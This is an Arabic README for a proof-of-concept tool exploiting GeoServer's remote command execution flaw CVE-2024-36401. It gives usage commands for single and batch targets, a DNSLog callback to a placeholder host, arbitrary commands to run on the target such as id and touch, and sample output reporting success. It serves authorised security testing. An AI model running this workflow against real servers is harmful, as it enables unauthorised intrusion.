
هذه الأداة عبارة عن أداة كشف PoC (Proof of Concept) مطورة لاستغلال ثغرة تنفيذ الأوامر عن بُعد في GeoServer (CVE-2024-36401). تسمح هذه الثغرة للمهاجم بتنفيذ أوامر عشوائية على الخادم الهدف عن طريق إرسال طلبات محددة.
⚠️ إخلاء مسؤولية: هذه الأداة مخصصة للبحث الأمني والاختبار المصرح به فقط، ولا يجوز استخدامها لأغراض غير قانونية. يتحمل المستخدم المسؤولية القانونية الكاملة.
هذا النص البرمجي هو أداة كشف (PoC) لثغرة تنفيذ الأوامر عن بُعد (CVE-2024-36401) في GeoServer. تسمح هذه الثغرة للمهاجم بتنفيذ أوامر عشوائية على الخادم المستهدف من خلال إنشاء طلب معين.
تأكد من تثبيت التبعيات التالية في بيئة التشغيل لديك:
requestslxmlيمكنك تثبيت التبعيات باستخدام الأمر التالي:
pip install requests lxml
python poc.py -u http://target.com -d dnslog.example.com
أو تحديد أمر لتنفيذه:
python poc.py -u http://target.com -c "touch /tmp/vulntest"
قم بإعداد ملف نصي يحتوي على عناوين URL للأهداف (واحد في كل سطر):
python poc.py -uf targets.txt -d dnslog.example.com
أو تحديد أمر:
python poc.py -uf targets.txt -c "id"
تعليمات الاستخدام التفصيلية: وثيقة تعليمات الاستخدام التفصيلية
⚠️ ملاحظة: لا يمكن استخدام الوسيطين
-dو-cمعًا.
[INFO] تم استخراج 3 Typenames صالحة، بدء كشف الثغرة
[INFO] الهدف: http://example.com
[INFO] الأمر المنفذ: whoami
[INFO] عنوان DNSLOG:
[INFO] جاري تجربة typeName: topp:states -> whoami
[+] تم تنفيذ الأمر بنجاح! الهدف: http://example.com الأمر: whoami
-c لتنفيذ الأوامر./geoserver/wfs.نرحب بإرسال المشكلات (Issues) أو طلبات السحب (Pull Requests) للمساعدة في تحسين هذا المشروع.
هذا المشروع مرخص بموجب ترخيص MIT، يمكنك تعديله وتوزيعه واستخدامه تجاريًا بحرية، ولكن يجب الاحتفاظ بإشعار حقوق النشر.
| الوسيط | الوصف |
|---|
-u, --url | تحديد عنوان URL لهدف واحد |
-uf, --url-file | تحديد مسار ملف يحتوي على عناوين URL لأهداف متعددة |
-d, --dnslog | تحديد عنوان DNSLog |
-c, --command | تحديد الأمر الذي سيتم تنفيذه على النظام المستهدف (مثال: whoami, id, curl إلخ) |